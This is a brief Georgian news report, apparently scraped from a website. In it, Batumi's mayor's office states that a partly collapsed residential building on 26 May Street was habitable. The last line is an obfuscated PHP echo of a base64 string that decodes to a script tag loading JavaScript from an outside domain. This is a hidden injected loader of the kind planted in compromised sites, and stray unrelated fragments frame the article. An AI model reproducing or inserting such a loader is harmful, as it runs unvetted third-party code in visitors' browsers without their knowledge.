celsiusi
ავერსი შნაიდერი
ბათუმში, 5-სართულიანი საცხოვრებელი კორპუსი, რომლის ნაწილიც ცოტა ხნის წინ ჩამოინგრა, საცხოვრებლად ვარგისი იყო. ამის შესახებ „ინტერპრესნიუსს“ ბათუმის მერიაში განუცხადეს.
 
მათივე ინფორმაციით, კორპუსი ამორტიზებული არ იყო.
 
„საცხოვრებელი კორპუსის მდგრადობასთან დაკავშირებით განაცხადი ბოლო პერიოდის განმავლობაში მერიაში არ შემოსულა. კორპუსი იყო საცხოვრებლად ვარგისი“, - განაცხადეს ბათუმის მერიაში.
 
ცნობისთვის, ბათუმში, 26 მაისის ქუჩაზე საცხოვრებელი კორპუსის ერთი სადარბაზო მთლიანად ჩამოინგრა. ადგილზე მობილიზებულია სამაშველო და სასწრაფო დახმარების სამსახურები.
971
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");